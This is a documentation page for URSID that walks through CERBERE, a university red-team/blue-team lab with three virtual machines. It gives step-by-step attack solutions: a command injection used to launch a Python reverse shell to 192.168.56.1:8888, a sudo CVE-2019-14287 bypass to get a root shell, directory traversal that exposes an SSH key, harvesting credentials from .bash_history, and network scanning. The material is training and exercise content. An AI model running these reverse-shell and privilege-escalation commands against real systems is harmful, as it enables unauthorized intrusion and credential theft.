<!DOCTYPE html>
<html class="writer-html5" lang="en" >
<head>
  <meta charset="utf-8" /><meta name="generator" content="Docutils 0.18.1: http://docutils.sourceforge.net/" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>CERBERE &mdash; URSID  documentation</title>
      <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
      <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
  <!--[if lt IE 9]>
    <script src="_static/js/html5shiv.min.js"></script>
  <![endif]-->
  
        <script src="_static/jquery.js"></script>
        <script src="_static/_sphinx_javascript_frameworks_compat.js"></script>
        <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>
        <script src="_static/doctools.js"></script>
        <script src="_static/sphinx_highlight.js"></script>
    <script src="_static/js/theme.js"></script>
    <link rel="index" title="Index" href="genindex.html" />
    <link rel="search" title="Search" href="search.html" />
    <link rel="next" title="Creating your own scenario" href="creating_your_own_scenario.html" />
    <link rel="prev" title="Adding procedures" href="adding_procedures.html" /> 
</head>

<body class="wy-body-for-nav"> 
  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >

          
          
          <a href="index.html" class="icon icon-home">
            URSID
          </a>
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" aria-label="Search docs" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>
        </div><div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <p class="caption" role="heading"><span class="caption-text">Contents:</span></p>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="provided_procedures.html">Provided procedures.</a></li>
<li class="toctree-l1"><a class="reference internal" href="adding_procedures.html">Adding procedures</a></li>
<li class="toctree-l1 current"><a class="current reference internal" href="#">CERBERE</a><ul>
<li class="toctree-l2"><a class="reference internal" href="#zagreus">Zagreus</a><ul>
<li class="toctree-l3"><a class="reference internal" href="#t1190-exploit-public-facing-application-2-possible-procedures">T1190: Exploit Public-Facing Application (2 possible procedures).</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-command-injection-no-character-limit">Procedure 1: Command injection (no character limit)</a></li>
<li class="toctree-l4"><a class="reference internal" href="#procedure-2-command-injection-character-limit">Procedure 2: Command injection (character limit)</a></li>
</ul>
</li>
<li class="toctree-l3"><a class="reference internal" href="#t1068-exploitation-for-privilege-escalation">T1068: Exploitation for Privilege Escalation.</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-vulnerable-sudo-package-cve-2019-14287">Procedure 1: Vulnerable sudo package (CVE-2019-14287)</a></li>
<li class="toctree-l4"><a class="reference internal" href="#t1552-unsecured-credentials-2-procedures">T1552: Unsecured Credentials (2 procedures)</a></li>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-passwords-in-txt">Procedure 1: Passwords in .txt.</a></li>
<li class="toctree-l4"><a class="reference internal" href="#procedure-2-passwords-in-bash-history">Procedure 2: Passwords in .bash_history.</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="#hades">Hades</a><ul>
<li class="toctree-l3"><a class="reference internal" href="#t1190-exploit-public-facing-application-1-procedure">T1190: Exploit Public-Facing Application (1 procedure).</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-django-website-with-directory-traversal">Procedure 1: Django website with directory traversal.</a></li>
</ul>
</li>
<li class="toctree-l3"><a class="reference internal" href="#t1021-remote-services-1-procedure">T1021: Remote Services (1 procedure).</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-remote-services-through-ssh-reusing-a-ssh-key">Procedure 1: Remote Services through SSH, reusing a SSH key.</a></li>
</ul>
</li>
<li class="toctree-l3"><a class="reference internal" href="#id1">T1552: Unsecured Credentials (2 procedures).</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#id2">Procedure 1: Passwords in .txt.</a></li>
<li class="toctree-l4"><a class="reference internal" href="#id3">Procedure 2: Passwords in .bash_history.</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="#melinoe">Melinoe</a><ul>
<li class="toctree-l3"><a class="reference internal" href="#id4">T1021: Remote Services (1 procedure)</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#procedure-1-remote-sql-access-to-a-database-containing-a-flag">Procedure 1: Remote SQL access to a database containing a flag.</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="creating_your_own_scenario.html">Creating your own scenario</a></li>
<li class="toctree-l1"><a class="reference internal" href="on_secret_generation.html">How secret generation works</a></li>
<li class="toctree-l1"><a class="reference internal" href="chouchen_api.html">About <code class="docutils literal notranslate"><span class="pre">chouchen</span></code></a></li>
<li class="toctree-l1"><a class="reference internal" href="apiculteur_api.html">About <code class="docutils literal notranslate"><span class="pre">apiculteur</span></code></a></li>
</ul>

        </div>
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"><nav class="wy-nav-top" aria-label="Mobile navigation menu" >
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="index.html">URSID</a>
      </nav>

      <div class="wy-nav-content">
        <div class="rst-content">
          <div role="navigation" aria-label="Page navigation">
  <ul class="wy-breadcrumbs">
      <li><a href="index.html" class="icon icon-home" aria-label="Home"></a></li>
      <li class="breadcrumb-item active">CERBERE</li>
      <li class="wy-breadcrumbs-aside">
            <a href="_sources/cerbere_scenario.md.txt" rel="nofollow"> View page source</a>
      </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
             
  <section id="cerbere">
<h1>CERBERE<a class="headerlink" href="#cerbere" title="Permalink to this heading"></a></h1>
<p>CERBERE (Cybersecurity Exercise for Red and Blue team Entertainment, Reproducibility and Experience) is a
proof-of-concept scenario entirely formalized, refined then deployed using URSID.
It was played at a local university by a team of around 15 students, as part of a red-team/blue-team exercise.</p>
<p>CERBERE includes:</p>
<ul class="simple">
<li><p>3 machines, 2 including websites (which will be accessible from a local network), all equipped with auditd logging.</p></li>
<li><p>6 attack positions.</p></li>
<li><p>7 procedures, spread through 4 ATT&amp;CK techniques.</p></li>
</ul>
<p><img alt="CERBERE tech" src="_images/scenario_cerbere_technique.png" /><em>Graphical representation of the CERBERE scenario on a technical
level.</em></p>
<section id="zagreus">
<h2>Zagreus<a class="headerlink" href="#zagreus" title="Permalink to this heading"></a></h2>
<section id="t1190-exploit-public-facing-application-2-possible-procedures">
<h3>T1190: Exploit Public-Facing Application (2 possible procedures).<a class="headerlink" href="#t1190-exploit-public-facing-application-2-possible-procedures" title="Permalink to this heading"></a></h3>
<ul class="simple">
<li><p>Access the website by opening 192.168.56.2:3000 in your browser (might require http instead of https!).</p></li>
<li><p>This machine hosts a node.js website executed as user <em>alice</em>, which is vulnerable to command injection.</p></li>
<li><p>Indeed, a misconfiguration in how piping is handled by the parser leads to command execution by running</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>anycommand<span class="w"> </span><span class="p">|</span><span class="w"> </span>YOURCOMMAND
</pre></div>
</div>
<ul class="simple">
<li><p>This command injection is accessible through the search function on the profile page, accessible after creating a
profile.</p></li>
<li><p>This vulnerability can be found either by trial and error, or using tools such
as <a class="reference external" href="https://portswigger.net/burp/communitydownload">Burp</a>.</p></li>
</ul>
<section id="procedure-1-command-injection-no-character-limit">
<h4>Procedure 1: Command injection (no character limit)<a class="headerlink" href="#procedure-1-command-injection-no-character-limit" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>In particular this lets the attacker access a shell, for instance by opening a listener with</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>nc<span class="w"> </span>-nlvp<span class="w"> </span><span class="m">8888</span>
</pre></div>
</div>
<p>on the host machine, and launching a reverse shell with</p>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>hop<span class="w"> </span><span class="p">|</span><span class="w"> </span>python3<span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.56.1&quot;,8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;/bin/sh&quot;)&#39;</span>
</pre></div>
</div>
<p>on the website injection when used locally.</p>
<ul class="simple">
<li><p>Note that it is possible to directly connect to your reverse shell because the virtual machines are deployed in a
local network.</p></li>
<li><p>If your network setup is different and you wish to exploit the website remotely, you might need to use a tool such
as <a class="reference external" href="https://ngrok.com/">ngrok</a>
to act as a middle man.</p></li>
</ul>
</section>
<section id="procedure-2-command-injection-character-limit">
<h4>Procedure 2: Command injection (character limit)<a class="headerlink" href="#procedure-2-command-injection-character-limit" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>If executing the above command gives you an error, it means you randomly got the harder version of the website.</p></li>
<li><p>This version limits the maximum number of characters in a query to 50.</p></li>
<li><p>Fortunately, you use the upload function to add a script opening a remote shell, then executing the script through the
search command.</p></li>
<li><p>If the profile “test” was created, any images uploaded will be in the ./public/images/test/ repository.</p></li>
<li><p>You may also have to use chmod to give it execution privileges.</p></li>
<li><p>A useful trick to save some characters is to use wildcards in paths (such as using ./pub*/im*/test/ instead of the
above).</p></li>
</ul>
</section>
</section>
<section id="t1068-exploitation-for-privilege-escalation">
<h3>T1068: Exploitation for Privilege Escalation.<a class="headerlink" href="#t1068-exploitation-for-privilege-escalation" title="Permalink to this heading"></a></h3>
<section id="procedure-1-vulnerable-sudo-package-cve-2019-14287">
<h4>Procedure 1: Vulnerable sudo package (<a class="reference external" href="https://www.exploit-db.com/exploits/47502">CVE-2019-14287</a>)<a class="headerlink" href="#procedure-1-vulnerable-sudo-package-cve-2019-14287" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>The machine may be vulnerable to a privilege escalation coming from the sudo package being an old version.</p></li>
<li><p>You may find this out by running <em>sudo -v</em>.</p></li>
<li><p>If this is the case, the sudoers file will have been edited to allow alice to execute commands
as anyone except root (run <em>sudo -l</em> to check).</p></li>
<li><p>This can be bypassed with sudo -u#-1 command.</p></li>
<li><p>For instance, to acess a file you’re not supposed to:</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>sudo<span class="w"> </span>-u#-1<span class="w"> </span>cat<span class="w"> </span>.bash_history
</pre></div>
</div>
<ul class="simple">
<li><p>But you can also just open a shell with root privileges</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>sudo<span class="w"> </span>-u#-1<span class="w"> </span>/bin/bash
</pre></div>
</div>
<section id="procedure-2-vulnerable-pkexec-process-cve-2021-4034">
<h5>Procedure 2: Vulnerable pkexec process (<a class="reference external" href="https://nvd.nist.gov/vuln/detail/cve-2021-4034">CVE-2021-4034</a>)<a class="headerlink" href="#procedure-2-vulnerable-pkexec-process-cve-2021-4034" title="Permalink to this heading"></a></h5>
<ul class="simple">
<li><p>The machine may also be vulnerable to a privilege escalation coming from the OS being an old version.</p></li>
<li><p>You may find the version of your OS by running <em>hostnamectl</em>. If this indicates you are on Ubuntu 16.04, this is the
exploit you’ll have to use.</p></li>
<li><p>Tools such as <a class="reference external" href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">LinPEAS</a> are also able to find this.</p></li>
<li><p>Several online resources indicate how to exploit this vulneraiblity and get a root
shell <a class="reference external" href="https://github.com/berdav/CVE-2021-4034">example</a>).</p></li>
</ul>
</section>
</section>
<section id="t1552-unsecured-credentials-2-procedures">
<h4>T1552: Unsecured Credentials (2 procedures)<a class="headerlink" href="#t1552-unsecured-credentials-2-procedures" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>This machine will contain a password to be reused to access machine Hades.</p></li>
<li><p>This password will be stored somewhere in the superuser home directory.</p></li>
<li><p>It is possible to find out about the superuser by checking the /etc/passwd file or just checking the /home directory.</p></li>
</ul>
</section>
<section id="procedure-1-passwords-in-txt">
<h4>Procedure 1: Passwords in .txt.<a class="headerlink" href="#procedure-1-passwords-in-txt" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>/home/superuser will contain a file named <em>important.txt</em>, containing the relevant user credentials.</p></li>
</ul>
</section>
<section id="procedure-2-passwords-in-bash-history">
<h4>Procedure 2: Passwords in .bash_history.<a class="headerlink" href="#procedure-2-passwords-in-bash-history" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>/home/superuser/.bash_history will contain the relevant user credentials.</p></li>
</ul>
</section>
</section>
</section>
<section id="hades">
<h2>Hades<a class="headerlink" href="#hades" title="Permalink to this heading"></a></h2>
<section id="t1190-exploit-public-facing-application-1-procedure">
<h3>T1190: Exploit Public-Facing Application (1 procedure).<a class="headerlink" href="#t1190-exploit-public-facing-application-1-procedure" title="Permalink to this heading"></a></h3>
<section id="procedure-1-django-website-with-directory-traversal">
<h4>Procedure 1: Django website with directory traversal.<a class="headerlink" href="#procedure-1-django-website-with-directory-traversal" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>Access the website with 192.168.56.3:8000 (might require http instead of https!).</p></li>
<li><p>This machine hosts a django website executed as user <em>bob</em>, which will be vulnerable to a directory traversal.</p></li>
<li><p>This will also let attackers reuse credentials acquired in machine Zagreus.</p></li>
<li><p>A SSH key may be found in the /notes/ directory (ie 192.168.56.3:8000/admin/notes).</p></li>
<li><p>You may find out about this directory by checking the error you get when trying to access an invalid directory.</p></li>
</ul>
</section>
</section>
<section id="t1021-remote-services-1-procedure">
<h3>T1021: Remote Services (1 procedure).<a class="headerlink" href="#t1021-remote-services-1-procedure" title="Permalink to this heading"></a></h3>
<section id="procedure-1-remote-services-through-ssh-reusing-a-ssh-key">
<h4>Procedure 1: Remote Services through SSH, reusing a SSH key.<a class="headerlink" href="#procedure-1-remote-services-through-ssh-reusing-a-ssh-key" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>This SSH key may be used to access the superuser privileged account. This however has to be done from the internal
network, aka machine zagreus.</p></li>
<li><p>The key is a single line on the notes directory, and needs to be converted back to the proper key format.</p></li>
<li><p>Open your prefered text editor and replace every space with a new line.</p></li>
<li><p>The note also contains information about the user.</p></li>
<li><p>The bash we get from the command injection is a bit janky (can’t use CTRL commands, so can’t use nano), making it
annoying to paste the key there.</p></li>
<li><p>You may still however copy paste things using right click. It may also be possible to upgrade the shell using external
tools.</p></li>
<li><p>Since you have root access on zagreus, you can install nmap there and run a scan on the local network.</p></li>
<li><p>You can get the ip of the local network using the <em>ip a</em> command, which will give you the local ip of zagreus.</p></li>
<li><p>For instance, if the local zagreus ip is 10.35.60.12, the subnetwork will be 10.35.60.0/24.</p></li>
<li><p>You may thus run (from a root shell on zagreus)</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>sudo<span class="w"> </span>apt<span class="w"> </span>install<span class="w"> </span>nmap
nmap<span class="w"> </span><span class="m">10</span>.35.60.0/24<span class="w"> </span>-vv
</pre></div>
</div>
<ul class="simple">
<li><p>This will give you the ips of hades and melinoe and their open ports. Use the hades IP to access it through ssh.</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>touch<span class="w"> </span>key
<span class="nb">echo</span><span class="w"> </span><span class="s1">&#39;COPY_PASTE_YOUR_KEY_HERE&#39;</span><span class="w"> </span>&gt;&gt;<span class="w"> </span>key
chmod<span class="w"> </span><span class="m">600</span><span class="w"> </span>key<span class="w"> </span>
ssh<span class="w"> </span>superuser@HADES_IP<span class="w"> </span>-i<span class="w"> </span>key
</pre></div>
</div>
</section>
</section>
<section id="id1">
<h3>T1552: Unsecured Credentials (2 procedures).<a class="headerlink" href="#id1" title="Permalink to this heading"></a></h3>
<ul class="simple">
<li><p>Functionally identical to the one in Zagreus.</p></li>
<li><p>This machine will contain a password to be reused to access machine Hades.</p></li>
<li><p>This password will be stored somewhere in the superuser home directory.</p></li>
<li><p>It is possible to find out about the superuser by checking the /etc/passwd file or just checking the /home directory.</p></li>
</ul>
<section id="id2">
<h4>Procedure 1: Passwords in .txt.<a class="headerlink" href="#id2" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>/home/superuser will contain a file named <em>important.txt</em>, containing the relevant user credentials.</p></li>
</ul>
</section>
<section id="id3">
<h4>Procedure 2: Passwords in .bash_history.<a class="headerlink" href="#id3" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>/home/superuser/.bash_history will contain the relevant user credentials.</p></li>
</ul>
</section>
</section>
</section>
<section id="melinoe">
<h2>Melinoe<a class="headerlink" href="#melinoe" title="Permalink to this heading"></a></h2>
<section id="id4">
<h3>T1021: Remote Services (1 procedure)<a class="headerlink" href="#id4" title="Permalink to this heading"></a></h3>
<section id="procedure-1-remote-sql-access-to-a-database-containing-a-flag">
<h4>Procedure 1: Remote SQL access to a database containing a flag.<a class="headerlink" href="#procedure-1-remote-sql-access-to-a-database-containing-a-flag" title="Permalink to this heading"></a></h4>
<ul class="simple">
<li><p>Hades comes with psql pre-installed (it’d make sense for an admin there to have it).</p></li>
<li><p>Access the machine through its open postgresql service using the password you found before.</p></li>
</ul>
<div class="highlight-bash notranslate"><div class="highlight"><pre><span></span>psql<span class="w"> </span>-h<span class="w"> </span><span class="m">192</span>.168.56.4<span class="w"> </span>-p<span class="w"> </span><span class="m">5432</span><span class="w"> </span>-U<span class="w"> </span>postgres<span class="w"> </span>
</pre></div>
</div>
<ul class="simple">
<li><p>This database will containg a unique entry referring to an image path on the machine. Finding this entry is
effectively
the end of this scenario.</p></li>
</ul>
</section>
</section>
</section>
</section>


           </div>
          </div>
          <footer><div class="rst-footer-buttons" role="navigation" aria-label="Footer">
        <a href="adding_procedures.html" class="btn btn-neutral float-left" title="Adding procedures" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left" aria-hidden="true"></span> Previous</a>
        <a href="creating_your_own_scenario.html" class="btn btn-neutral float-right" title="Creating your own scenario" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right" aria-hidden="true"></span></a>
    </div>

  <hr/>

  <div role="contentinfo">
    <p>&#169; Copyright .</p>
  </div>

  Built with <a href="https://www.sphinx-doc.org/">Sphinx</a> using a
    <a href="https://github.com/readthedocs/sphinx_rtd_theme">theme</a>
    provided by <a href="https://readthedocs.org">Read the Docs</a>.
   

</footer>
        </div>
      </div>
    </section>
  </div>
  <script>
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(true);
      });
  </script> 

</body>
</html>